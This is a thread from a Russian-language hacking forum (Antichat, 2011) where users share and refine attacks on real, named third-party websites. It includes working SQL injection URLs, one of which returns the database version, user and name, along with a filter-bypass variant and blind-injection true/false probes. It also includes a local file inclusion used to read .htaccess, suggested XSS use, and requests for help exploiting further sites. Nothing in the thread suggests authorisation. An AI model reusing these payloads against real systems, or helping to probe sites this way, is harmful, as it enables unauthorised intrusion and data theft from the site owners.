ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

12.12.2011, 01:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от None
Include /etc/apache2/vhosts.d/*.conf
Как-бы намекает.
|
|
|

12.12.2011, 02:49
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от ~EviL~
~EviL~ said:
Вот нашел уязвимость:
Код:
Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
А дальше можно как-то развить ее?
LFI, но похоже, что из директории не выпускает.
http://www.eash.eu/phpmyadmin/print.css- файл есть
http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет
Можно почитать файлы, к которым нет доступа через сайт:
http://www.eash.eu/openletter2011/index.php?file=.htaccess
Использовать для XSS:
http://www.eash.eu/openletter2011/index.php?file=
Или просто найти другой баг на сайте, как было написано выше =)
Код:
Code:
http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20+--+
5.1.49-3:eash_live@localhost:eash_live
Кавычки не фильтруются и не экранируются
|
|
|

12.12.2011, 04:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 35174
Репутация:
-6
|
|
Код:
Code:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+
Can't get vuln number?
|
|
|
|

12.12.2011, 04:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+
Can't get vuln number?
http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+
|
|
|

12.12.2011, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 35174
Репутация:
-6
|
|
Is this site vulnerable?
Код:
Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0
Nothing yet works on it.
|
|
|
|

12.12.2011, 21:45
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от lightangel
lightangel said:
Is this site vulnerable?
Код:
Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0
Nothing yet works on it.
Yes. Its vulnerable
Код:
Code:
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=5 TRUE
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=4 FALSE
|
|
|

13.12.2011, 00:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 35174
Репутация:
-6
|
|
Thank you, I thought as much; Blind SQL Injection.
I'll have my take on it.
|
|
|
|

13.12.2011, 09:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 49472
Репутация:
0
|
|
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...
|
|
|
|

13.12.2011, 13:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от infoseller
infoseller said:
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...
Имхо это обычный заголовок, вставляемый в TITLE страницы. Ничего другого без указания линка на ум не идёт...
|
|
|

13.12.2011, 16:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|